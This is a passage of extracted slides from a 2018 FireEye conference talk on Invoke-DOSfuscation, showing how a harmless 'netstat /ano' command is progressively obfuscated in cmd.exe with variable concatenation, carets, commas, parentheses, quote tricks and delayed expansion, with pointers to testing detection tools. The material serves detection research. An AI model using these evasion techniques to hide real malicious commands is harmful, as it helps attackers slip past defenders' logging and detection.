![Page 96: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/96.jpg)
• cmd /c "set com1=net&&set com2=stat&&set com3= /ano&&call
%com1%%com2%%com3%"
96
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 97: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/97.jpg)
• cmd /c "set com1=net&&set com2=stat&&set com3= /ano&&call
%com1%%com2%%com3%"
97
#TestYourTools:
• Sysmon EID 1 CommandLine adds duplicate %'s
• EventVwr.exe
• PowerShell's Get-WinEvent
Payload Obfuscation 1 of 4: Concatenation
http://www.danielbohannon.com/blog-1/2018/3/19/test-your-dfir-tools-sysmon-edition
DETOUR
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 98: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/98.jpg)
• cmd /c "set com1=net&&set com2=stat&&set com3= /ano&&call
%com1%%com2%%com3%"
98
• Reorder substrings
• Set into single final env var
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 99: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/99.jpg)
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call
%com1%%com2%%com3%"
99
• Reorder substrings
• Set into single final env var
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 100: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/100.jpg)
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set
final=%com1%%com2%%com3%&&call %final%"
100
• Reorder substrings
• Set into single final env var
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 101: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/101.jpg)
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set
final=%com1%%com2%%com3%&&call %final%"
101
1.
2.
3.
4.
5.
1.
2.
3.
4.
5.
Invoke-DOSfuscation argumentsFinal syntax
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 102: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/102.jpg)
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set
final=%com1%%com2%%com3%&&call %final%"
102
1. call %final%
2.
3.
4.
5.
1. (default when possible)
2.
3.
4.
5.
Invoke-DOSfuscation argumentsFinal syntax
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 103: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/103.jpg)
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set
final=%com1%%com2%%com3%&&call %final%"
103
1. call %final%
2. cmd /c %final%
3.
4.
5.
1. (default when possible)
2. -FinalBinary cmd
3.
4.
5.
Invoke-DOSfuscation argumentsFinal syntax
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 104: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/104.jpg)
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set
final=%com1%%com2%%com3%&&call %final%"
104
1. call %final%
2. cmd /c %final%
3. call echo %final% | cmd
4.
5.
1. (default when possible)
2. -FinalBinary cmd
3. -FinalBinary cmd -StdIn
4.
5.
Invoke-DOSfuscation argumentsFinal syntax
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 105: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/105.jpg)
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set
final=%com1%%com2%%com3%&&call %final%"
105
1. call %final%
2. cmd /c %final%
3. call echo %final% | cmd
4. call powershell "%final%"
5.
1. (default when possible)
2. -FinalBinary cmd
3. -FinalBinary cmd -StdIn
4. -FinalBinary PowerShell
5.
Invoke-DOSfuscation argumentsFinal syntax
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 106: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/106.jpg)
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set
final=%com1%%com2%%com3%&&call %final%"
106
1. call %final%
2. cmd /c %final%
3. call echo %final% | cmd
4. call powershell "%final%"
5. call echo %final% | powershell -
1. (default when possible)
2. -FinalBinary cmd
3. -FinalBinary cmd -StdIn
4. -FinalBinary PowerShell
5. -FinalBinary PowerShell -StdIn
Invoke-DOSfuscation argumentsFinal syntax
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 107: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/107.jpg)
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set
final=%com1%%com2%%com3%&&call %final%"
107
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 108: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/108.jpg)
• CMd /C "sEt coM3= /ano&&SEt cOm2=stat&&seT CoM1=net&&caLl SeT
fiNAl=%COm1%%cOm2%%coM3%&&cAlL %FinAl%"
108
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
•
•
•
•
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 109: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/109.jpg)
• CMd/C"sEt coM3= /ano&&SEt cOm2=stat&&seT CoM1=net&&caLl SeT
fiNAl=%COm1%%cOm2%%coM3%&&cAlL %FinAl%"
109
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
•
•
•
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 110: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/110.jpg)
• CMd /C " sEt coM3= /ano&& SEt cOm2=stat&& seT CoM1=net&& caLl
SeT fiNAl=%COm1%%cOm2%%coM3%&& cAlL %FinAl% "
110
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
•
•
•
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 111: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/111.jpg)
• ;,,CMd,; ,/C ", ;, ;sEt coM3= /ano&&,,,SEt cOm2=stat&&;;;seT CoM1=net&&,
;caLl,;,SeT fiNAl=%COm1%%cOm2%%coM3%&&; , ,cAlL, ;, ;%FinAl% "
111
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
• Comma & semicolon
•
•
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 112: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/112.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ;, ;s^Et ^ ^ co^M3=^^ /^^an^o&&,,,S^Et^ ^
^cO^m2=^s^^ta^^t&&;;;s^eT^ ^ C^oM1^=^n^^et&&, ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%&&; , ,c^AlL^, ;,^ ;%Fi^nAl^% "
112
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
• Comma & semicolon
• Caret
•
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 113: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/113.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^et) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
113
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
• Comma & semicolon
• Caret
• Parentheses
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 114: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/114.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^et) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
114
CMd ,; ,/C ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^et) ) &&, (( ;c^aLl,^;,S^e^T ^
^ fi^NAl^=^%%COm1^%%%%c^Om2%%^%%c^oM3^%%))&&; (, ,(c^AlL^, ;,^
;%%Fi^nAl^%%) ) "
netstat /ano
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 115: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/115.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^e""t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
115
CMd ,; ,/C ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^e""t) ) &&, (( ;c^aLl,^;,S^e^T
^ ^ fi^NAl^=^%%COm1^%%%%c^Om2%%^%%c^oM3^%%))&&; (, ,(c^AlL^,
;,^ ;%%Fi^nAl^%%) ) "
ne""tstat /ano
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 116: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/116.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n^^e""t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
116
ne""tstat /ano
vs
n"e"tstat /ano
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 117: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/117.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n"^^e"t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
117
ne""tstat /ano
vs
n"e"tstat /ano
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 118: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/118.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n"^^e"t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
118
ne""tstat /ano
vs
n"e"tstat /ano
✘If we have to pair double
quotes, how can we unpair
in final variable?
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 119: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/119.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n"^^e"t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
119
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1.
2.
3.
4.
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 120: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/120.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&, (( ;c^aLl,^;,S^e^T ^ ^
fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^ ;%Fi^nAl^%) ) "
120
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2.
3.
4.
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 121: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/121.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^%) ) "
121
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3.
4.
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 122: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/122.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^ %) ) "
122
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4.
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 123: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/123.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""= %) ) "
123
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4.
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 124: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/124.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=%quotes:~0,1%%) ) "
124
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4.
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 125: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/125.jpg)
• ;,,C^Md^,; ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=%quotes:~0,1%%) ) "
125
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4.
✘ ✘
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 126: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/126.jpg)
https://i.imgur.com/PD9klNV.jpg
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=%quotes:~0,1%%) ) "
126
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4. ???
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 127: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/127.jpg)
https://i.imgur.com/PD9klNV.jpg
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=!quotes:~0,1!%) ) "
127
ne""tstat /ano
vs
n"e"tstat /ano
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4. ???
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 128: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/128.jpg)
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=!quotes:~0,1!%) ) "
128
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4. ???
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 129: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/129.jpg)
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=!quotes:~0,1!%) ) "
129
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4. ???
Payload Obfuscation 1 of 4: Concatenation
https://pbs.twimg.com/media/DHCh2GvWAAUevcd.jpg:large
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 130: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/130.jpg)
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=!quotes:~0,1!%) ) "
130
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4. Variable expansion
• /V:ON
• /V:O
• /V:
